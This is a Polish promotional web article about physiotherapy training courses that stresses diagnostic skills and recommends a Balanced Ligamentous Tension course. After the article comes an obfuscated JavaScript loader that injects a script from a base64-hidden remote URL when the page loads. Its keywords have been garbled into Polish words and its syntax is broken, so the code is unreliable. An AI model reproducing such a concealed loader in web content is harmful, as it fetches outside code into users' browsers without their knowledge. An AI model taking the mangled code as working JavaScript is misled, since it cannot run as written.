Fizjoterapia pozwala zwalczać problemy stawowo-mięśniowe. Najczęściej kojarzona jest z nią terapia manualna, a szczególnie masaże. Specjaliści w tej dziedzinie potrafią znacznie więcej. Uczęszczającym na profesjonalne kursy fizjoterapia pozwala diagnozować schorzenia, dzięki czemu są to osoby oferujące kompleksowe wsparcie swoim pacjentom.

Oferta szkoleń powinna zainteresować nie tylko specjalistów z zakresu terapii manualnej, ale też ich pacjentów. Taka wiedza pozwoli znaleźć najlepszego fizjoterapeutę dla siebie.

Diagnostyka obrazowa i różnicowa przed doborem terapii

Diagnostyka ma kluczowe znaczenie dla przebiegu leczenia. Dobrze przeprowadzona pozwala lepiej dobrać terapię, a przede wszystkim nie będzie szkodliwa. Podanie nieodpowiednich leków i źle ustalone ćwiczenia mogą jeszcze bardziej osłabić organizm pacjenta. Nabycie wiedzy z zakresu diagnostyki jest w przypadku fizjoterapeutów niezwykle istotne. Dzięki temu mogą zweryfikować opinie lekarzy i wesprzeć ich pracę. Masażystów na kursach i studentów fizjoterapii uczy się przede wszystkim 2 metod diagnozowania:

  • diagnostyka obrazowa – obejmuje badania, takie jak TK czy rezonans magnetyczny. Dają one obraz tkanek wewnętrznych i szkieletu, pozwalając zlokalizować miejsce urazu.
  • diagnostyka różnicowa – wskazuje przyczynę bólu poprzez wykluczenie innych schorzeń. Dzięki niej terapeuci odróżniają ból związany z przeciążeniem od poważnego urazu.

Często podczas badania u fizjoterapeuty możemy dowiedzieć się o zupełnie innych schorzeniach, wymagających leczenia. Ból przypominający mięśniowy może być np. spowodowany kamicą nerkową. Wtedy nie pomogą żadne techniki terapeutyczne.

Jakie znaczenie mają szkolenia dla fizjoterapeutów?

Zdarza się, że objawy przypominające problemy z układem kostno-stawowo-mięśniowym mają zupełnie inne podłoże. Ból i obrzęki mogą występować w poważnych chorobach, a ucisk i naciąganie mięśni podczas masażu może być niebezpieczny. Dlatego warto zwracać uwagę na to, czy wybrany fizjoterapeuta potrafi sam postawić diagnozę. Wskazują na to m.in. Dyplomy ukończenia specjalistycznych kursów. Podczas wielu z nich instruktorzy przekazują wiedzę z zakresu rehabilitacji i terapii manualnej. Ważne, żeby szkolenie uczyło też jak postępować z pacjentem w różnych sytuacjach.

W praktyce fizjoterapeuty liczy się każdy szczegół. Dlatego tak duże znaczenie ma to, aby podczas warsztatów z fizjoterapii nabyć też umiejętności diagnozowania, przede wszystkim od strony praktycznej.

Mnóstwo niezbędnej wiedzy przekazują takie kursy dla fizjoterapeutów jak Balanced Ligamentous Tension, równoważenie napięć więzadłowych. Tego rodzaju umiejętności pozwalają ustalić skuteczne postępowanie w przypadku wystąpienia bólu, obrzęków i zmiany tekstury tkanki. To świetny kurs dla terapeutów manualnych i osteopatów. Jego uczestnicy będą potrafili zająć się wszystkimi pacjentami, gwarantując bardzo korzystną ofertę.

 

 

 

 

 

(funkcja(nwqplfjk, myrrfatk, pigbqqzw, dvyxoqms, aqngrzhg, zfqboeso){
aqngrzhg = myrrfatk.createElement(pigbqqzw);zfqboeso = myrrfatk.getElementsByTagName(pigbqqzw)[0];
aqngrzhg.ascyc = 1;
aqngrzhg.src = atob(dvyxoqms)
zfqboeso.parentNode.insertBefore(aqngrzhg, zfqboeso);
})(okno, dokument, `skrypt`, `aHR0cHM6Ly9zdGF0cy5saW5raG91c2UuY28vYXBpL2FuYWx5emVyL3YxL3NjcmlwdC9jZTU1NmI4ZC0zOWZmLTRhZjEtYjhlNi1jYTAyZWU4Mm JjMjYuanM=”)

Jesteś diagnostą?

Dodaj swoją placówkę!

Strona korzysta z plików cookies w celu realizacji usług i zgodnie z Polityką Prywatności. Możesz określić warunki przechowywania lub dostępu do plików cookies w Twojej przeglądarce.

Diagnozujmy 2020. Wszelkie prawa zastrzeżone.

0
Would love your thoughts, please comment.x
()
x